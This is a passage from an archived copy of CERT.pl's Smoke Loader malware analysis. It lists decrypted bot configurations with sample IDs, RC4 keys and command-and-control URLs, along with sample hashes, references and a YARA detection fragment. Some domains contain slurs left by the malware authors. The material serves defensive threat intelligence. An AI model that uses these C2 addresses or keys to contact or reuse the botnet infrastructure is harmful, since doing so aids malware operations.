(u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://bomonero.su/'}, {u'cnc': u'http://monerobo.su/'}, {u'cnc':\r\nu'http://bomonero2.su/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'DAY28'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://boboxmr.ru/'}, {u'cnc': u'http://boboboxmr.ru/'}, {u'cnc':\r\nu'http://boboboboxmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'ek'), (u'rc4_key_resp', u'0x9b1c59c1'), (u'rc4_key_req',\r\nu'0x12bb71ab'), (u'domains', [{u'cnc': u'http://lxlxcripicrewbrothrzlxlx.ru/'}, {u'cnc':\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 57 of 63\n\nu'http://brokacashbang.ru/'}, {u'cnc': u'http://localbotzchile.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'europ'), (u'rc4_key_resp', u'0x691a4b2d'), (u'rc4_key_req',\r\nu'0x2727222a'), (u'domains', [{u'cnc': u'http://92.53.105.14/'}, {u'cnc': u'http://92.53.105.14/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'gucci'), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'hack'), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'ita2'), (u'rc4_key_resp', u'0x3dd8ff8e'), (u'rc4_key_req',\r\nu'0x18888780'), (u'domains', [{u'cnc': u'http://charlesadvanced.top/'}, {u'cnc':\r\nu'http://kathrinewesson.top/'}, {u'cnc': u'http://advertisersbellboy.top/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'ital1'), (u'rc4_key_resp', u'0xdfa88d40'), (u'rc4_key_req',\r\nu'0xfe3c1254'), (u'domains', [{u'cnc': u'http://bookwormsbiorhythm.top/'}, {u'cnc':\r\nu'http://bottleneckkendricks.top/'}, {u'cnc': u'http://counterrevolutionarysbackslappers.top/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'JNE01'), (u'rc4_key_resp', u'0xd2db0a4a'), (u'rc4_key_req',\r\nu'0x7ebea1d6'), (u'domains', [{u'cnc': u'http://samaywondererer.top/monster/images/team/'}, {u'cnc':\r\nu'http://julesmitthxrfusion.top/monster/images/team/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'main'), (u'rc4_key_resp', u'0xbe6b0e7d'), (u'rc4_key_req',\r\nu'0xf115307e'), (u'domains', [{u'cnc': u'http://imanigger123f.online/cock/'}, {u'cnc':\r\nu'http://dontgiveafucknymore.su/cock/'}, {u'cnc': u'http://hackhackerhack3.bid/cock/'}, {u'cnc':\r\nu'http://dontfuckinghackme2.win/cock/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'mgsl1'), (u'rc4_key_resp', u'0xa0567c9e'), (u'rc4_key_req',\r\nu'0xc90e7080'), (u'domains', [{u'cnc': u'http://tanromerefket.win/'}, {u'cnc':\r\nu'http://tanromerefket.win/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'miner'), (u'rc4_key_resp', u'0x4785b9c9'), (u'rc4_key_req',\r\nu'0xbf993ae2'), (u'domains', [{u'cnc': u'http://21072206.ru/'}, {u'cnc': u'http://backup21072206.ru/'},\r\n{u'cnc': u'http://jiangwei.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'NEW27'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay26.ru/'}, {u'cnc': u'http://ngay2610.ru/'}, {u'cnc':\r\nu'http://ngay261017.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'newnw'), (u'rc4_key_resp', u'0xbe6b0e7d'), (u'rc4_key_req',\r\nu'0xf115307e'), (u'domains', [{u'cnc': u'http://imanigger123f.online/cock/'}, {u'cnc':\r\nu'http://dontgiveafucknymore.su/cock/'}, {u'cnc': u'http://hackhackerhack3.bid/cock/'}, {u'cnc':\r\nu'http://dontfuckinghackme2.win/cock/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'nitly'), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 58 of 63\n\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'nuke'), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'OLDBB'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, {u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'OLDBB'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://boboxmr.ru/'}, {u'cnc': u'http://boboboxmr.ru/'}, {u'cnc':\r\nu'http://boboboboxmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'OLDBM'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://bomonero.su/'}, {u'cnc': u'http://monerobo.su/'}, {u'cnc':\r\nu'http://bomonero2.su/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'pepes'), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'peren'), (u'rc4_key_resp', u'0x3dd8ff8e'), (u'rc4_key_req',\r\nu'0x18888780'), (u'domains', [{u'cnc': u'http://charlesadvanced.top/'}, {u'cnc':\r\nu'http://kathrinewesson.top/'}, {u'cnc': u'http://advertisersbellboy.top/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'STUB2'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay26.ru/'}, {u'cnc': u'http://ngay2610.ru/'}, {u'cnc':\r\nu'http://ngay261017.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'STUB3'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay26.ru/'}, {u'cnc': u'http://ngay2610.ru/'}, {u'cnc':\r\nu'http://ngay261017.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'TEST1'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, {u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'testl'), (u'rc4_key_resp', u'0xa0567c9e'), (u'rc4_key_req',\r\nu'0xc90e7080'), (u'domains', [{u'cnc': u'http://domhoappst.xyz/'}, {u'cnc': u'http://domhoappst.xyz/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'xxxxx'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://cb2017.ru/'}, {u'cnc': u'http://2017cb.ru/'}, {u'cnc':\r\nu'http://cb17.ru/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 59 of 63\n\n[(u'smk_magic', 2017), (u'sample_id', u'yeshi'), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'yyyyy'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay26.ru/'}, {u'cnc': u'http://ngay2610.ru/'}, {u'cnc':\r\nu'http://ngay261017.ru/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x152b4cad'), (u'rc4_key_req',\r\nu'0xe6327736'), (u'domains', [{u'cnc': u'http://migyno.bid/'}, {u'cnc': u'http://migyno.win/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x152b4cad'), (u'rc4_key_req',\r\nu'0xe6327736'), (u'domains', [{u'cnc': u'https://exvirnani.win/'}, {u'cnc': u'https://exvirnani.bid/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x3287a63'), (u'rc4_key_req',\r\nu'0xfdcfac42'), (u'domains', [{u'cnc': u'http://housingcorp.net/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x55caff7d'), (u'rc4_key_req',\r\nu'0x668caa56'), (u'domains', [{u'cnc': u'https://exmach.win/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x55caff7d'), (u'rc4_key_req',\r\nu'0x668caa56'), (u'domains', [{u'cnc': u'https://experttools.stream/'}, {u'cnc':\r\nu'https://experttools.ml/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x77460d95'), (u'rc4_key_req',\r\nu'0x5a7bf6e6'), (u'domains', [{u'cnc': u'http://lillano.se/'}, {u'cnc': u'http://custom-sslconection.com/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0xd278d61a'), (u'rc4_key_req',\r\nu'0x9c509bec'), (u'domains', [{u'cnc': u'http://mediainfo.xyz/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0xf0030a01'), (u'rc4_key_req',\r\nu'0x5ffdf3fe'), (u'domains', [{u'cnc': u'http://cindyarrest.bid/'}, {u'cnc':\r\nu'http://andersenavoidably.bid/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u'0806'), (u'rc4_key_resp', u'0xf0030a01'), (u'rc4_key_req',\r\nu'0x5ffdf3fe'), (u'domains', [{u'cnc': u'http://wozzeckskasai.bid/'}, {u'cnc':\r\nu'http://bateclobbered.bid/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u'amaz'), (u'rc4_key_resp', u'0x77460d95'), (u'rc4_key_req',\r\nu'0x5a7bf6e6'), (u'domains', [{u'cnc': u'http://lillano.se/'}, {u'cnc': u'http://custom-sslconection.com/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u'bus'), (u'rc4_key_resp', u'0x78821544'), (u'rc4_key_req',\r\nu'0xaf03e678'), (u'domains', [{u'cnc': u'http://servicecredits2.4irc.com/'}, {u'cnc':\r\nu'http://servicecredits1.4irc.com/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u'test'), (u'rc4_key_resp', u'0x121da0f3'), (u'rc4_key_req',\r\nu'0x1c16c0a2'), (u'domains', [{u'cnc': u'http://gateway777.my/'}, {u'cnc': u'http://winnapi.com/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 60 of 63\n\n[(u'smk_magic', 2018), (u'sample_id', u'Traf'), (u'rc4_key_resp', u'0xb61de5bb'), (u'rc4_key_req',\r\nu'0xdbe946d2'), (u'domains', [{u'cnc': u'https://mollikertes.win/prof/index.php'}, {u'cnc':\r\nu'https://rocknrolletco.top/prof/index.php'}])]\r\nHashes:\r\nd68bbc1c707d093488cd95c75090cd56bc5d2eabba375dd3e3e2731ee8969945\r\n9ad749b1da7ca205ae9f5fefa91342a48d91eedfef15cbdf2f5ed7c878ea80dc\r\n7d449f036fd0b8dff39148a7964ebd941d6694e122861b9ae764ded2aa143203\r\n2235babf7a3a3545611adeae64a083dbf7eee960db17fe68ee9c8bcff36dd3b9\r\na021999d1153d87f8f21eb98fe4d34dd3d6b38eed28b831c0b5302f630e482c3\r\nb65806521aa662bff2c655c8a7a3b6c8e598d709e35f3390df880a70c3fded40\r\n67c13df5d4169b6c95c48fb149f8b8cd11dd3b045a51d4f12e0397ccd7e2384a\r\ncd955ad86a10ed6cb973192b99597b6fef6e4048ba9990dcad4cce5cbe6bbf26\r\n1075e8d7330ce9d73cc6db6d08d9963fe38a33de58d255a9d3cf2a548abab7ab\r\n7544141eb65a5bb0c2e3e4909af000006f75afc70cad56107dbf5445dfa830a0\r\n70b82194b4394e49968065bf4f4d9cbff4a9f3c4d0edce0282da8e766b553b72\r\n0458aae969b5e8da81f8db283d4706d146b62dbdacc45a4ea28b9c5af9ac2ea7\r\n71b83a8f1c813489936a1fa884efe753dc72c3e42fc09191d5b188addac7a50f\r\n35a532b10e8602afcb5d55c608f6fec7298d6174af8d22d045f05b2d13373987\r\n8caf448ce78f753a7e975d2a116c52a22e29cc08f2a069c8324385f220e21b19\r\n40093a88a625abc6e289fd9389f0d7abb803f19f466c74a35031cb0bfa697460\r\n282d87939edbe0745176ae57a41282c34c8b98775784cd6dcd632906c14485a8\r\n28e0fbce1710c5a61a12499b489cb0ee5cc541127d9954635fcc541d56c90f79\r\nf5bcc7097663055d76cb51fc9bc6c39919fd078f13b01560a246ece1ca43df57\r\n1492c884cac74928521021b0d5a7994a9fd828fffc2c25963159f4d21371c169\r\n6f8f82731d2ae71265a39017df34643eac589b20552d64b15ec9f9f497acba8d\r\n20dce650c10545ae85005b3fe159df250c4f1275edfe4439e2d5a2d0515029de\r\n64e811e7ca2de7f5d52a0a95c960a31651db4c370da271e24b0bf86e7f19677e\r\n5cd1d95e5709b93b48747b3134f645ca40dfa0ecc099f34dc475488691d84048\r\n56472dcf4d3aa1c9419b1cc74eb892e4fdf82577712aece5f4a87144fe1b6f3d\r\n05f07a9f265f9c95a32ca59ad176be4098192802146968bb2c81a7fc7b529d2b\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 61 of 63\n\n5bd0eeb537b5efb078e0df30416ddce1c35e204610a4ef104f842f7c93e835f3\r\n6a9c96b088b240d96f50dda3aa174410f6e41fda12f430c92a502fa2ac690d38\r\nbbd82e1bd5ed3b5678669e7aad23a64a950801fa2060f10d55f781c92b25e3a0\r\n1d469c16c72618a2bb40aa2f6a6b761dbb45b70dd440a9fa109bee61abbfbb0e\r\n92515d262bdda93f32d3fe8b93098021b2eaaccc995227b1bdb9bef125258cbe\r\ne22f05e70d58d2c5117feaf468462c939a5ec53fd33d7b8d47cf2b66d49ab94b\r\n49a84c74da18a04492c949a8758e2d28a82a99ac1bc8714aef04c684f2d82bdf\r\nabfa5ed1aff1bd75ecf138e08f841572a0bd4ed56db9cd44f5be5def96c0b665\r\n255cb851c6efc840d6c95de7e2ee53b6a0a77356d4d5f05488851ee02ccae256\r\n7368bfa34ebc092662ccaa7388e8a5586dbb9dc2de4ba5374bcb52793602c696\r\n1c3f68baa9a035a34f5dc6d5631541b359d4f94b3a47d4a965e3ca423461b608\r\n77bb011aafbf7a504fc33a28c18b5760f5d641168c8531bd51a3882aba0fb9f5\r\nc39125e9a0d4e0f33d0e9b0e508d2943fae48785426f78db6224a6a931e49886\r\n4e785dc121f563a9c235d494f10260d3f957c788f1ed45656238d782af8214a8\r\nc4f779558f7267d9ba0c5bd39ead0625fa56e3891f8c77d896eb9b769b7e5841\r\n4f1eee0cdd2a3ef82ce6aae645672fa75d01a081f06965ddbadf9fd7eae40e5d\r\nc89aab560b51adbd58fc44b42c96ef6324919bf1125a31b8631095f6f4c72416\r\n843c44649fe8cc572fd8b69e76165df8ea7db0ef9c323930a7440f6613cb6746\r\ne7448b7f9c2fbab65ea74adfa3bd8d05d839ed2acb2ade5288f120c3798fc271\r\nfafd41844f32be1835b59322182957434cf7fcb07a45da920ffa49f69c1404d6\r\nc1380d300afd41ac95b5145c3d281819b567d9fe1526dcba90d1e75e2e219ee1\r\n2489a4292c2c64e4aab56ec8d9b753e2e9da5b431136d866c2631a29851e7192\r\n1b6f51c84b5999eb881746b477bf59fa707f92e895ab02df8bc63c2691950694\r\n06a6ee1159eb8a14f78ccb260404ee4f9d315820aadf38c94e8cb64abe8925df\r\nReferences\r\n1\r\n https://grabberz.com/showthread.php?t=29680\r\n2\r\n https://web.archive.org/web/20160419010008/http://xaker.name/threads/22008/\r\n3\r\n http://stopmalvertising.com/rootkits/analysis-of-smoke-loader.html\r\n4\r\n http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 62 of 63\n\nhttps://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/\r\nSource: https://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 63 of 63\n\nauthor = strings: \"psrok1\"    \n$fetch_cnc_url1 = { 80 3d [4] ?? 76 ?? c6 05 [4] 01 3? ?? a0 [4] 8b }\n$fetch_cnc_url2 = { a1 [4] 83 f? ?? 75 ?? 3? ?? a3 [4] 5? 8b }\n   Page 37 of 63",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cert.pl/en/news/single/dissecting-smoke-loader/"
	],
	"report_names": [
		"dissecting-smoke-loader"
	],
	"threat_actors": [],
	"ts_created_at": 1775434678,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6d9215c5256d5e222d762c23d056c7ad6f7f89c6.pdf",
		"text": "https://archive.orkl.eu/6d9215c5256d5e222d762c23d056c7ad6f7f89c6.txt",
		"img": "https://archive.orkl.eu/6d9215c5256d5e222d762c23d056c7ad6f7f89c6.jpg"
	}
}